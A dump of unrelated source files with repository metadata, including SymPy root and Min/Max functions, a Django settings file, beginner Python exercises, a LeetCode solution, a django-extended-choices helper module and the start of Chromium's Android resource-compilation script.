root(x, n) -> Returns the principal n-th root of x. Examples ======== >>> from sympy import root, Rational >>> from sympy.abc import x, n >>> root(x, 2) sqrt(x) >>> root(x, 3) x**(1/3) >>> root(x, n) x**(1/n) >>> root(x, -Rational(2, 3)) x**(-3/2) To get all n n-th roots you can use the RootOf function. The following examples show the roots of unity for n equal 2, 3 and 4: >>> from sympy import RootOf, I >>> [ RootOf(x**2-1,i) for i in (0,1) ] [-1, 1] >>> [ RootOf(x**3-1,i) for i in (0,1,2) ] [1, -1/2 - sqrt(3)*I/2, -1/2 + sqrt(3)*I/2] >>> [ RootOf(x**4-1,i) for i in (0,1,2,3) ] [-1, 1, -I, I] SymPy, like other symbolic algebra systems, returns the complex root of negative numbers. This is the principal root and differs from the text-book result that one might be expecting. For example, the cube root of -8 does not come back as -2: >>> root(-8, 3) 2*(-1)**(1/3) The real_root function can be used to either make such a result real or simply return the real root in the first place: >>> from sympy import real_root >>> real_root(_) -2 >>> real_root(-32, 5) -2 See Also ======== sympy.polys.rootoftools.RootOf sympy.core.power.integer_nthroot sqrt, real_root References ========== * http://en.wikipedia.org/wiki/Square_root * http://en.wikipedia.org/wiki/real_root * http://en.wikipedia.org/wiki/Root_of_unity * http://en.wikipedia.org/wiki/Principal_value * http://mathworld.wolfram.com/CubeRoot.html """ n = sympify(n) return C.Pow(arg, 1/n) def real_root(arg, n=None): """Return the real nth-root of arg if possible. If n is omitted then all instances of -1**(1/odd) will be changed to -1. Examples ======== >>> from sympy import root, real_root, Rational >>> from sympy.abc import x, n >>> real_root(-8, 3) -2 >>> root(-8, 3) 2*(-1)**(1/3) >>> real_root(_) -2 See Also ======== sympy.polys.rootoftools.RootOf sympy.core.power.integer_nthroot root, sqrt """ if n is not None: n = as_int(n) rv = C.Pow(arg, Rational(1, n)) if n % 2 == 0: return rv else: rv = sympify(arg) n1pow = Transform(lambda x: S.NegativeOne, lambda x: x.is_Pow and x.base is S.NegativeOne and x.exp.is_Rational and x.exp.p == 1 and x.exp.q % 2) return rv.xreplace(n1pow) ############################################################################### ############################# MINIMUM and MAXIMUM ############################# ############################################################################### class MinMaxBase(Expr, LatticeOp): def __new__(cls, *args, **assumptions): if not args: raise ValueError("The Max/Min functions must have arguments.") args = (sympify(arg) for arg in args) # first standard filter, for cls.zero and cls.identity # also reshape Max(a, Max(b, c)) to Max(a, b, c) try: _args = frozenset(cls._new_args_filter(args)) except ShortCircuit: return cls.zero # second filter # variant I: remove ones which can be removed # args = cls._collapse_arguments(set(_args), **assumptions) # variant II: find local zeros args = cls._find_localzeros(set(_args), **assumptions) _args = frozenset(args) if not _args: return cls.identity elif len(_args) == 1: return set(_args).pop() else: # base creation obj = Expr.__new__(cls, _args, **assumptions) obj._argset = _args return obj @classmethod def _new_args_filter(cls, arg_sequence): """ Generator filtering args. first standard filter, for cls.zero and cls.identity. Also reshape Max(a, Max(b, c)) to Max(a, b, c), and check arguments for comparability """ for arg in arg_sequence: # pre-filter, checking comparability of arguments if (arg.is_real is False) or (arg is S.ComplexInfinity): raise ValueError("The argument '%s' is not comparable." % arg) if arg == cls.zero: raise ShortCircuit(arg) elif arg == cls.identity: continue elif arg.func == cls: for x in arg.iter_basic_args(): yield x else: yield arg @classmethod def _find_localzeros(cls, values, **options): """ Sequentially allocate values to localzeros. When a value is identified as being more extreme than another member it replaces that member; if this is never true, then the value is simply appended to the localzeros. """ localzeros = set() for v in values: is_newzero = True localzeros_ = list(localzeros) for z in localzeros_: if id(v) == id(z): is_newzero = False elif cls._is_connected(v, z): is_newzero = False if cls._is_asneeded(v, z): localzeros.remove(z) localzeros.update([v]) if is_newzero: localzeros.update([v]) return localzeros @classmethod def _is_connected(cls, x, y): """ Check if x and y are connected somehow. """ if (x == y) or isinstance(x > y, bool) or isinstance(x < y, bool): return True if x.is_Number and y.is_Number: return True return False @classmethod def _is_asneeded(cls, x, y): """ Check if x and y satisfy relation condition. The relation condition for Max function is x > y, for Min function is x < y. They are defined in children Max and Min classes through the method _rel(cls, x, y) """ if (x == y): return False if x.is_Number and y.is_Number: if cls._rel(x, y): return True xy = cls._rel(x, y) if isinstance(xy, bool): if xy: return True return False yx = cls._rel_inversed(x, y) if isinstance(yx, bool): if yx: return False # never occurs? return True return False def _eval_derivative(self, s): # f(x).diff(s) -> x.diff(s) * f.fdiff(1)(s) i = 0 l = [] for a in self.args: i += 1 da = a.diff(s) if da is S.Zero: continue try: df = self.fdiff(i) except ArgumentIndexError: df = Function.fdiff(self, i) l.append(df * da) return Add(*l) @property def is_real(self): return fuzzy_and(arg.is_real for arg in self.args) class Max(MinMaxBase, Application): """ Return, if possible, the maximum value of the list. When number of arguments is equal one, then return this argument. When number of arguments is equal two, then return, if possible, the value from (a, b) that is >= the other. In common case, when the length of list greater than 2, the task is more complicated. Return only the arguments, which are greater than others, if it is possible to determine directional relation. If is not possible to determine such a relation, return a partially evaluated result. Assumptions are used to make the decision too. Also, only comparable arguments are permitted. Examples ======== >>> from sympy import Max, Symbol, oo >>> from sympy.abc import x, y >>> p = Symbol('p', positive=True) >>> n = Symbol('n', negative=True) >>> Max(x, -2) #doctest: +SKIP Max(x, -2) >>> Max(x, -2).subs(x, 3) 3 >>> Max(p, -2) p >>> Max(x, y) #doctest: +SKIP Max(x, y) >>> Max(x, y) == Max(y, x) True >>> Max(x, Max(y, z)) #doctest: +SKIP Max(x, y, z) >>> Max(n, 8, p, 7, -oo) #doctest: +SKIP Max(8, p) >>> Max (1, x, oo) oo Algorithm The task can be considered as searching of supremums in the directed complete partial orders [1]_. The source values are sequentially allocated by the isolated subsets in which supremums are searched and result as Max arguments. If the resulted supremum is single, then it is returned. The isolated subsets are the sets of values which are only the comparable with each other in the current set. E.g. natural numbers are comparable with each other, but not comparable with the `x` symbol. Another example: the symbol `x` with negative assumption is comparable with a natural number. Also there are "least" elements, which are comparable with all others, and have a zero property (maximum or minimum for all elements). E.g. `oo`. In case of it the allocation operation is terminated and only this value is returned. Assumption: - if A > B > C then A > C - if A==B then B can be removed References ========== .. [1] http://en.wikipedia.org/wiki/Directed_complete_partial_order .. [2] http://en.wikipedia.org/wiki/Lattice_%28order%29 See Also ======== Min : find minimum values """ zero = S.Infinity identity = S.NegativeInfinity @classmethod def _rel(cls, x, y): """ Check if x > y. """ return (x > y) @classmethod def _rel_inversed(cls, x, y): """ Check if x < y. """ return (x < y) def fdiff( self, argindex ): from sympy.functions.special.delta_functions import Heaviside n = len(self.args) if 0 < argindex and argindex <= n: argindex -= 1 if n == 2: return Heaviside( self.args[argindex] - self.args[1-argindex] ) newargs = tuple([self.args[i] for i in xrange(n) if i != argindex]) return Heaviside( self.args[argindex] - Max(*newargs) ) else: raise ArgumentIndexError(self, argindex) class Min(MinMaxBase, Application): """ Return, if possible, the minimum value of the list. Examples ======== >>> from sympy import Min, Symbol, oo >>> from sympy.abc import x, y >>> p = Symbol('p', positive=True) >>> n = Symbol('n', negative=True) >>> Min(x, -2) #doctest: +SKIP Min(x, -2) >>> Min(x, -2).subs(x, 3) -2 >>> Min(p, -3) -3 >>> Min(x, y) #doctest: +SKIP Min(x, y) >>> Min(n, 8, p, -7, p, oo) #doctest: +SKIP Min(n, -7) See Also ======== Max : find maximum values """ zero = S.NegativeInfinity identity = S.Infinity @classmethod def _rel(cls, x, y): """ Check if x < y. """ return (x < y) @classmethod def _rel_inversed(cls, x, y): """ Check if x > y. """ return (x > y) def fdiff( self, argindex ): from sympy.functions.special.delta_functions import Heaviside n = len(self.args) if 0 < argindex and argindex <= n: argindex -= 1 if n == 2: return Heaviside( self.args[1-argindex] - self.args[argindex] ) newargs = tuple([ self.args[i] for i in xrange(n) if i != argindex]) return Heaviside( Min(*newargs) - self.args[argindex] ) else: raise ArgumentIndexError(self, argindex)
[ "ryanmeyersweb@gmail.com" ]
ryanmeyersweb@gmail.com
8e3884896f59a39e13d0286dd45828194ff0cc9f
c5746efe18a5406764c041d149d89c0e0564c5a5
/1. Python语言核心编程/1. Python核心/Day07/exercise/exercise02.py
32cc7fbbb5ffb79abbadf328b32b5dc4fe0f60f2
[]
no_license
ShaoxiongYuan/PycharmProjects
fc7d9eeaf833d3711211cd2fafb81dd277d4e4a3
5111d4c0a7644c246f96e2d038c1a10b0648e4bf
refs/heads/master
2021-12-15T05:45:42.117000
2021-11-23T06:45:16
2021-11-23T06:45:16
241,294,858
3
1
null
2021-02-20T15:29:07
2020-02-18T07:06:08
Jupyter Notebook
UTF-8
Python
false
false
528
py
def if_same_element(target_list): """ 判断列表中是否有相同元素 :param target_list: 一个列表 :return: 是否有相同元素 """ # result = False for i in range(len(target_list) - 1): for a in range(i + 1, len(target_list)): if target_list[i] == target_list[a]: return True # result = True # break # if result: # break return False list1 = [34, 8, 56, 9, 8, 9] print(if_same_element(list1))
[ "ysxstevenpp123@gmail.com" ]
ysxstevenpp123@gmail.com
853c926761dfcdcbcd017ed1b743532f010314aa
9e55f933b1228d50597b3ee723881674b8c25adf
/store_backend/config/settings/common.py
fd2c0b762d042217d8b942c8c0c2fb4bba89c152
[ "MIT" ]
permissive
rudolphpienaar/ChRIS_store
e77abdcc892bb5066d697add5673f1c9e198fa4f
db924ded8e3323bc77b5eb974516df1d70cdd4d4
refs/heads/master
2020-03-06T21:41:59.060552
2019-11-14T02:43:31
2019-11-14T02:43:31
127,084,343
0
0
null
2018-03-28T04:37:25
2018-03-28T04:37:24
null
UTF-8
Python
false
false
4,016
py
# -*- coding: utf-8 -*- """ Django settings for chris_backend project. Generated by 'django-admin startproject' using Django 1.9.5. For more information on this file, see https://docs.djangoproject.com/en/1.9/topics/settings/ For the full list of settings and their values, see https://docs.djangoproject.com/en/1.9/ref/settings/ """ import os # Build paths inside the project like this: os.path.join(BASE_DIR, ...) BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__))) # Quick-start development settings # See https://docs.djangoproject.com/en/1.9/howto/deployment/checklist/ ALLOWED_HOSTS = ['*'] # Application definition INSTALLED_APPS = [ 'django.contrib.admin', 'django.contrib.auth', 'django.contrib.contenttypes', 'django.contrib.sessions', 'django.contrib.messages', 'django.contrib.staticfiles', 'django_filters', 'mod_wsgi.server', 'rest_framework', 'rest_framework.authtoken', 'corsheaders', 'collectionjson', 'plugins', 'pipelines', 'users' ] # Pagination REST_FRAMEWORK = { 'PAGE_SIZE': 10, 'DEFAULT_PAGINATION_CLASS': 'rest_framework.pagination.LimitOffsetPagination', 'DEFAULT_RENDERER_CLASSES': ( 'collectionjson.renderers.CollectionJsonRenderer', 'rest_framework.renderers.JSONRenderer', 'rest_framework.renderers.BrowsableAPIRenderer', ), 'DEFAULT_PARSER_CLASSES': ( 'collectionjson.parsers.CollectionJsonParser', 'rest_framework.parsers.JSONParser', 'rest_framework.parsers.FormParser', 'rest_framework.parsers.MultiPartParser', ), 'DEFAULT_AUTHENTICATION_CLASSES': ( 'rest_framework.authentication.TokenAuthentication', 'rest_framework.authentication.BasicAuthentication', 'rest_framework.authentication.SessionAuthentication', ), 'DEFAULT_FILTER_BACKENDS': ( 'django_filters.rest_framework.DjangoFilterBackend', ) } MIDDLEWARE = [ 'core.middleware.ResponseMiddleware', 'corsheaders.middleware.CorsMiddleware', 'django.middleware.security.SecurityMiddleware', 'django.contrib.sessions.middleware.SessionMiddleware', 'django.middleware.common.CommonMiddleware', 'django.middleware.csrf.CsrfViewMiddleware', 'django.contrib.auth.middleware.AuthenticationMiddleware', 'django.contrib.messages.middleware.MessageMiddleware', 'django.middleware.clickjacking.XFrameOptionsMiddleware', ] ROOT_URLCONF = 'config.urls' TEMPLATES = [ { 'BACKEND': 'django.template.backends.django.DjangoTemplates', 'DIRS': [], 'APP_DIRS': True, 'OPTIONS': { 'context_processors': [ 'django.template.context_processors.debug', 'django.template.context_processors.request', 'django.contrib.auth.context_processors.auth', 'django.contrib.messages.context_processors.messages', ], }, }, ] WSGI_APPLICATION = 'config.wsgi.application' # Database # https://docs.djangoproject.com/en/1.9/ref/settings/#databases DATABASES = { 'default': { 'ENGINE': 'django.db.backends.mysql', } } # Password validation # https://docs.djangoproject.com/en/1.9/ref/settings/#auth-password-validators AUTH_PASSWORD_VALIDATORS = [ { 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator', }, { 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator', }, { 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator', }, { 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator', }, ] # Internationalization # https://docs.djangoproject.com/en/1.9/topics/i18n/ LANGUAGE_CODE = 'en-us' TIME_ZONE = 'America/New_York' USE_I18N = True USE_L10N = True USE_TZ = True # Static files (CSS, JavaScript, Images) # https://docs.djangoproject.com/en/1.9/howto/static-files/ STATIC_URL = '/static/'
[ "jbernal0019@yahoo.es" ]
jbernal0019@yahoo.es
fefdc0b44aed4811b72cf261766d16d88f7f1353
1bd3076902117867ec048210905195ba2aaaaa6b
/exercise/leetcode/python_src/by2017_Sep/Leet395.py
b0a38ca7d29434c505c9378e24dcca7f581c9b1f
[]
no_license
SS4G/AlgorithmTraining
d75987929f1f86cd5735bc146e86b76c7747a1ab
7a1c3aba65f338f6e11afd2864dabd2b26142b6c
refs/heads/master
2021-01-17T20:54:31.120884
2020-06-03T15:04:10
2020-06-03T15:04:10
84,150,587
2
0
null
2017-10-19T11:50:38
2017-03-07T03:33:04
Python
UTF-8
Python
false
false
1,068
py
class Solution(object): def longestSubstring(self, s, k): """ :type s: str :type k: int :rtype: int """ if len(s) == 0: return 0 return self.divideRecursive(s, k) def divideRecursive(self, s, k): cntDict = {} for i in s: cntDict.setdefault(i, 0) cntDict[i] += 1 badIdx = [-1, ] flag = True for idx in range(len(s)): # save the bad idx if cntDict[s[idx]] < k: badIdx.append(idx) flag = False if flag: return len(s) badIdx.append(len(s)) newStrs = [] for i in range(1, len(badIdx)): s0 = s[badIdx[i-1] + 1: badIdx[i]] if len(s0) != 0: newStrs.append(s0) maxLen = 0 for s1 in newStrs: maxLen = max(maxLen, self.divideRecursive(s1, k)) return maxLen if __name__ == "__main__": s = Solution() s0 = "ababbc" k = 2 print(s.longestSubstring(s0, k))
[ "ziheng_song@126.com" ]
ziheng_song@126.com
738462812ea73a23745bc0c307d24cb2fdd2bd41
677189954b8efda10f743a22a5758707ee0d6862
/extended_choices/helpers.py
c4f69af697b712b73afb3702ae804bd9278885e2
[ "BSD-3-Clause" ]
permissive
areski/django-extended-choices
5526aa43f2d562ac95be2db5e2f18d8352d5021e
ec7f8b23509174623e04a1c1d0d3832bd4c0d7fe
refs/heads/master
2021-01-21T03:16:07.006461
2015-10-14T21:20:06
2015-10-14T21:20:06
47,980,892
0
0
null
2015-12-14T14:45:50
2015-12-14T14:45:50
null
UTF-8
Python
false
false
10,205
py
"""Provides classes used to construct a full ``Choices`` instance. Notes ----- The documentation format in this file is numpydoc_. .. _numpydoc: https://github.com/numpy/numpy/blob/master/doc/HOWTO_DOCUMENT.rst.txt """ from __future__ import unicode_literals from builtins import object try: import cPickle as pickle except ImportError: import pickle from django.utils.functional import Promise class ChoiceAttributeMixin(object): """Base class to represent an attribute of a ``ChoiceEntry``. Used for ``constant``, ``name``, and ``display``. It must be used as a mixin with another type, and the final class will be a type with added attributes to access the ``ChoiceEntry`` instance and its attributes. Attributes ---------- choice_entry : instance of ``ChoiceEntry`` The ``ChoiceEntry`` instance that hold the current value, used to access its constant, value and display name. constant : property Returns the choice field holding the constant of the attached ``ChoiceEntry``. value : property Returns the choice field holding the value of the attached ``ChoiceEntry``. display : property Returns the choice field holding the display name of the attached ``ChoiceEntry``. original_type : type (class attribute) The class of the value used to create a new class. creator_type : type The class that created a new class. Will be ``ChoiceAttributeMixin`` except if it was overridden by the author. Example ------- Classes can be created manually: >>> class IntChoiceAttribute(ChoiceAttributeMixin, int): pass >>> field = IntChoiceAttribute(1, ChoiceEntry(('FOO', 1, 'foo'))) >>> field 1 >>> field.constant, field.value, field.display (u'FOO', 1, u'foo') >>> field.choice_entry (u'FOO', 1, u'foo') Or via the ``get_class_for_value`` class method: >>> klass = ChoiceAttributeMixin.get_class_for_value(1.5) >>> klass.__name__ 'FloatChoiceAttribute' >>> float in klass.mro() True """ def __new__(cls, *args, **kwargs): """Construct the object (the other class used with this mixin). Notes ----- Only passes the very first argument to the ``super`` constructor. All others are not needed for the other class, only for this mixin. """ if issubclass(cls, Promise): # Special case to manage lazy django stuff like ugettext_lazy return super(ChoiceAttributeMixin, cls).__new__(cls) return super(ChoiceAttributeMixin, cls).__new__(cls, *args[:1]) def __init__(self, value, choice_entry): """Initiate the object to save the value and the choice entry. Parameters ---------- value : ? Value to pass to the ``super`` constructor (for the other class using this mixin) choice_entry: ChoiceEntry The ``ChoiceEntry`` instance that hold the current value, used to access its constant, value and display name. Notes ----- Call the ``super`` constructor with only the first value, as the other class doesn't expect the ``choice_entry`` parameter. """ if isinstance(self, Promise): # Special case to manage lazy django stuff like ugettext_lazy super(ChoiceAttributeMixin, self).__init__(value._proxy____args, value._proxy____kw) else: super(ChoiceAttributeMixin, self).__init__() self.choice_entry = choice_entry @property def constant(self): """Property that returns the ``constant`` attribute of the attached ``ChoiceEntry``.""" return self.choice_entry.constant @property def value(self): """Property that returns the ``value`` attribute of the attached ``ChoiceEntry``.""" return self.choice_entry.value @property def display(self): """Property that returns the ``display`` attribute of the attached ``ChoiceEntry``.""" return self.choice_entry.display @property def original_value(self): """Return the original value used to create the current instance.""" return self.original_type(self) @classmethod def get_class_for_value(cls, value): """Class method to construct a class based on this mixin and the type of the given value. Parameters ---------- value: ? The value from which to extract the type to create the new class. Notes ----- The create classes are cached (in ``cls.__classes_by_type``) to avoid recreating already created classes. """ type_ = value.__class__ # Check if the type is already a ``ChoiceAttribute`` if issubclass(type_, ChoiceAttributeMixin): # In this case we can return this type return type_ # Create a new class only if it wasn't already created for this type. if type_ not in cls._classes_by_type: # Compute the name of the class with the name of the type. class_name = str('%sChoiceAttribute' % type_.__name__.capitalize()) # Create a new class and save it in the cache. cls._classes_by_type[type_] = type(class_name, (cls, type_), { 'original_type': type_, 'creator_type': cls, }) # Return the class from the cache based on the type. return cls._classes_by_type[type_] def __reduce__(self): """Reducer to make the auto-created classes picklable. Returns ------- tuple A tuple as expected by pickle, to recreate the object when calling ``pickle.loads``: 1. a callable to recreate the object 2. a tuple with all positioned arguments expected by this callable """ return ( # Function to create a choice attribute create_choice_attribute, ( # The class that created the class of the current value self.creator_type, # The original type of the current value self.original_value, # The tied `choice_entry` self.choice_entry ) ) _classes_by_type = {} def create_choice_attribute(creator_type, value, choice_entry): """Create an instance of a subclass of ChoiceAttributeMixin for the given value. Parameters ---------- creator_type : type ``ChoiceAttributeMixin`` or a subclass, from which we'll call the ``get_class_for_value`` class-method. value : ? The value for which we want to create an instance of a new subclass of ``creator_type``. choice_entry: ChoiceEntry The ``ChoiceEntry`` instance that hold the current value, used to access its constant, value and display name. Returns ------- ChoiceAttributeMixin An instance of a subclass of ``creator_type`` for the given value """ klass = creator_type.get_class_for_value(value) return klass(value, choice_entry) class ChoiceEntry(tuple): """Represents a choice in a ``Choices`` object, with easy access to its attribute. Expecting a tuple with three entries. (constant, value, display name), it will add three attributes to access then: ``constant``, ``value`` and ``display``. By passing a dict after these three first entries, in the tuple, it's alose possible to add some other attributes to the ``ChoiceEntry` instance``. Parameters ---------- tuple_ : tuple A tuple with three entries, the name of the constant, the value, and the display name. A dict could be added as a fourth entry to add additional attributes. Example ------- >>> entry = ChoiceEntry(('FOO', 1, 'foo')) >>> entry (u'FOO', 1, u'foo') >>> (entry.constant, entry.value, entry.display) (u'FOO', 1, u'foo') >>> entry.choice (1, u'foo') You can also pass attributes to add to the instance to create: >>> entry = ChoiceEntry(('FOO', 1, 'foo', {'bar': 1, 'baz': 2})) >>> entry (u'FOO', 1, u'foo') >>> entry.bar 1 >>> entry.baz 2 Raises ------ AssertionError If the number of entries in the tuple is not expected. Must be 3 or 4. """ # Allow to easily change the mixin to use in subclasses. ChoiceAttributeMixin = ChoiceAttributeMixin def __new__(cls, tuple_): """Construct the tuple with 3 entries, and save optional attributes from the 4th one.""" # Ensure we have exactly 3 entries in the tuple and an optional dict. assert 3 <= len(tuple_) <= 4, 'Invalid number of entries in %s' % (tuple_,) # Call the ``tuple`` constructor with only the real tuple entries. obj = super(ChoiceEntry, cls).__new__(cls, tuple_[:3]) # Save all special attributes. obj.constant = obj._get_choice_attribute(tuple_[0]) obj.value = obj._get_choice_attribute(tuple_[1]) obj.display = obj._get_choice_attribute(tuple_[2]) # Add an attribute holding values as expected by django. obj.choice = (obj.value, obj.display) # Add additional attributes. if len(tuple_) == 4: for key, value in tuple_[3].items(): setattr(obj, key, value) return obj def _get_choice_attribute(self, value): """Get a choice attribute for the given value. Parameters ---------- value: ? The value for which we want a choice attribute. Returns ------- An instance of a class based on ``ChoiceAttributeMixin`` for the given value. Raises ------ ValueError If the value is None, as we cannot really subclass NoneType. """ if value is None: raise ValueError('Using `None` in a `Choices` object is not supported. You may ' 'use an empty string.') return create_choice_attribute(self.ChoiceAttributeMixin, value, self)
[ "s.angel@twidi.com" ]
s.angel@twidi.com
8d9d148953206e97e3b9e765ea30a82e1f309b3c
b52781b9065f6c571beb1b87cc1bbe2bd121d272
/homework02-2.py
ec526d0046c8919a827e61fc4c767ff2980b0b1d
[ "Apache-2.0" ]
permissive
liuhuihui123/liuhuihui
97e4182bb2003b95d1236f8f8e108215beaa9dfa
5dfa7b6ba7bc752edc48e981dd71f81017d3b673
refs/heads/master
2020-03-29T18:06:07.971173
2018-10-12T01:28:21
2018-10-12T01:28:21
150,194,561
0
0
null
null
null
null
UTF-8
Python
false
false
2,844
py
'''#1 import math a, b, c = eval(raw_input("Enter a, b, c:")) n = b*b-4*a*c if (n>0): r1 =( -b + math.sqrt(b*b-4*a*c))/2*a r2 =( -b - math.sqrt(b*b-4*a*c))/2*a print(r1 , r2) elif (n==0): r1 =( -b + math.sqrt(b*b-4*a*c))/2*a r2 =( -b - math.sqrt(b*b-4*a*c))/2*a r1 = r2 print(r1) if (n<0) : print("The equation has no real roots") ''' '''#2 import random n1=random.randint(1,100) n2=random.randint(1,100) n=n1+n2 num = raw_input(("qing shu ru shang mian de lia ge shu zhi he:")) if num == n: print("True") else: print("False") print(n) ''' '''#3 today = eval (raw_input("jin tian shi :")) day = eval(raw_input("guo le ji tian :")) week = (today+day)%7 if week == 0: print("jin tian shi {} and the future day is Sunday".format(today)) elif week == 1: print("jin tian shi {} and the future day is Monday".format(today)) elif week == 2: print("jin tian shi {} and the future day is Tuesday".format(today)) elif week == 3: print("jin tian shi {} and the future day is Wendnesday".format(today)) elif week == 4: print("jin tian shi {} and the future day is Thurday".format(today)) elif week == 5: print("jin tian shi {} and the future day is Firday".format(today)) ''' '''#4 print("qing shu ru san ge zheng shu :") x = eval(raw_input(">>")) y = eval(raw_input(">>")) z = eval(raw_input(">>")) if x>y: x,y = y,x if x>z: x,z = z,x if y>z: y,z = z,y print(x,y,z) ''' '''#5 w1,p1 = eval(raw_input('Enter weight and price for package 1"')) w2,p2 = eval(raw_input('Enter weight and price for package 2"')) baozhuang1 = p1 / w1 baozhuang2 = p2 / w2 if baozhuang1 < baozhuang2: print('package 1 has the better price') elif baozhuang1 >baozhuang2: print('package 2 has the better price') else: print('package 1 the same as package 2') ''' '''#6 month ,year = eval(raw_input("shu ru month and years:")) a = 0 if(a){ case 1: case 3: case 5: case 7: case 8: case 10: case 12 :print("31\n");break case 2:if (year%4==0 and year%100!=0 | year%400==0): a=29 else: a=28 case 4: case 6: case 9: case 11:print("30\n"); } print(a) ''' '''#7 import random yingbi = eval(raw_input("cha shi zhengmian(1) huanshi fanmian(0):")) n = random.randint(0,1) if (n == 1): print('True') if n==0: print('False') ''' '''#11 num = eval(raw_input("shu ru yi ge san wei shu:")) bai = num /100 shi = num/10%10 ge = num % 10 if bai == ge: print("{} is a pailndrome".format(num)) else: print("{} is not a pailndrome".format(num)) ''' '''#12 a,b,c = eval(raw_input("shu ru san jiao xing de san ge bian:")) zc = a+b+c if (a+b>c): print("The perimeter is {}".format(zc)) else: print("shu ru fei fa") '''
[ "root@localhost.localdomain" ]
root@localhost.localdomain
9687778c402ee8e82a0755b2f05fcccedc652e9c
747afe9a5915c28831b86b0a5e2c044212664da5
/20170908/lyrichu_20170908_02.py
c61772bc56e104218c145a6deb05cb7f8116d16d
[]
no_license
nitinreddy3/Python-Machine-Learning-Homework
61c7b882b49e868ca37443feaa89494d5b6eba4a
b088bdcdb24892260e1db416d50f0750872e80bc
refs/heads/master
2021-07-17T04:42:12.233768
2017-10-23T15:29:24
2017-10-23T15:29:24
null
0
0
null
null
null
null
UTF-8
Python
false
false
1,303
py
#!/usr/bin/env python # -*- coding: utf-8 -*- # @Time : 2017/9/8 17:55 # @Author : Lyrichu # @Email : 919987476@qq.com # @File : lyrichu_20170908_02.py ''' @Description: 2、100个人围成一圈,编号从1开始到100.从1开始报数,报到M的人自动退出,下一个人接着从1开始报数,直到剩余人数小于M。求最后剩余人的编号。 样例输入: 3 样例输出: 58 91 样例输入2: 4 样例输出2: 34 45 97 ''' m = int(raw_input()) restNum = 100 # 剩余人数 indexNumberList = [[i,(i-1)%m + 1] for i in range(1,restNum+1)] # [学生序号,列表] 组成的列表 lastNumber = m if restNum % m == 0 else restNum % m # 最后一个学生的报数 while(restNum >= m): indexNumberList = [v for v in indexNumberList if v[1] != m] # 删除报数为 m的学生 indexNumberList[0][1] = 1 if lastNumber+1>m else lastNumber+1 # 学生报数m之后,下一个为1 restNum = len(indexNumberList) # 更新剩余人数 # 逐个报数 for i in range(restNum-1): indexNumberList[i+1][1] = indexNumberList[i][1] + 1 if(indexNumberList[i+1][1] > m): indexNumberList[i+1][1] = 1 lastNumber = indexNumberList[-1][1] # 记录最后一个人的报数 print(" ".join(map(lambda x:str(x),[v[0] for v in indexNumberList])))
[ "919987476@qq.com" ]
919987476@qq.com
53736c845010ca9ab5541f5868401ff5198989c3
c8e6cf760a78ec45dbc2d3b6452e352d12da1f43
/build/android/gyp/compile_resources.py
a40864b8c3e4aa1f405d00e52b7c2a1ecf967b08
[ "BSD-3-Clause" ]
permissive
tojoyccnu/chromium
15479d1d9e8159d5eecd61571d33effa78e573b7
8cba72403a712767289acb2c7cd06d1116db42cc
refs/heads/master
2023-03-04T11:55:25.131615
2018-06-26T13:34:07
2018-06-26T13:34:07
null
0
0
null
null
null
null
UTF-8
Python
false
false
24,111
py
#!/usr/bin/env python # # Copyright (c) 2012 The Chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. """Compile Android resources into an intermediate APK. This can also generate an R.txt, and an .srcjar file containing the proper final R.java class for all resource packages the APK depends on. This will crunch images with aapt2. """ import argparse import collections import multiprocessing.pool import os import re import shutil import subprocess import sys import zipfile from xml.etree import ElementTree from util import build_utils from util import resource_utils _SOURCE_ROOT = os.path.dirname(os.path.dirname(os.path.dirname(os.path.dirname( __file__)))) # Import jinja2 from third_party/jinja2 sys.path.insert(1, os.path.join(_SOURCE_ROOT, 'third_party')) from jinja2 import Template # pylint: disable=F0401 # Pngs that we shouldn't convert to webp. Please add rationale when updating. _PNG_WEBP_BLACKLIST_PATTERN = re.compile('|'.join([ # Crashes on Galaxy S5 running L (https://crbug.com/807059). r'.*star_gray\.png', # Android requires pngs for 9-patch images. r'.*\.9\.png', # Daydream requires pngs for icon files. r'.*daydream_icon_.*\.png'])) # Regular expression for package declaration in 'aapt dump resources' output. _RE_PACKAGE_DECLARATION = re.compile( r'^Package Group ([0-9]+) id=0x([0-9a-fA-F]+)') def _PackageIdArgument(x): """Convert a string into a package ID while checking its range. Args: x: argument string. Returns: the package ID as an int, or -1 in case of error. """ try: x = int(x, 0) if x < 0 or x > 127: x = -1 except ValueError: x = -1 return x def _ParseArgs(args): """Parses command line options. Returns: An options object as from argparse.ArgumentParser.parse_args() """ parser, input_opts, output_opts = resource_utils.ResourceArgsParser() input_opts.add_argument('--android-manifest', required=True, help='AndroidManifest.xml path') input_opts.add_argument( '--shared-resources', action='store_true', help='Make all resources in R.java non-final and allow the resource IDs ' 'to be reset to a different package index when the apk is loaded by ' 'another application at runtime.') input_opts.add_argument( '--app-as-shared-lib', action='store_true', help='Same as --shared-resources, but also ensures all resource IDs are ' 'directly usable from the APK loaded as an application.') input_opts.add_argument( '--shared-resources-whitelist', help='An R.txt file acting as a whitelist for resources that should be ' 'non-final and have their package ID changed at runtime in R.java. ' 'Implies and overrides --shared-resources.') input_opts.add_argument('--proto-format', action='store_true', help='Compile resources to protocol buffer format.') input_opts.add_argument('--support-zh-hk', action='store_true', help='Use zh-rTW resources for zh-rHK.') input_opts.add_argument('--debuggable', action='store_true', help='Whether to add android:debuggable="true"') input_opts.add_argument('--version-code', help='Version code for apk.') input_opts.add_argument('--version-name', help='Version name for apk.') input_opts.add_argument( '--no-compress', help='disables compression for the given comma-separated list of ' 'extensions') input_opts.add_argument( '--locale-whitelist', default='[]', help='GN list of languages to include. All other language configs will ' 'be stripped out. List may include a combination of Android locales ' 'or Chrome locales.') input_opts.add_argument('--exclude-xxxhdpi', action='store_true', help='Do not include xxxhdpi drawables.') input_opts.add_argument( '--xxxhdpi-whitelist', default='[]', help='GN list of globs that say which xxxhdpi images to include even ' 'when --exclude-xxxhdpi is set.') input_opts.add_argument('--png-to-webp', action='store_true', help='Convert png files to webp format.') input_opts.add_argument('--webp-binary', default='', help='Path to the cwebp binary.') input_opts.add_argument('--no-xml-namespaces', action='store_true', help='Whether to strip xml namespaces from processed ' 'xml resources') input_opts.add_argument( '--check-resources-pkg-id', type=_PackageIdArgument, help='Check the package ID of the generated resources table. ' 'Value must be integer in [0..127] range.') 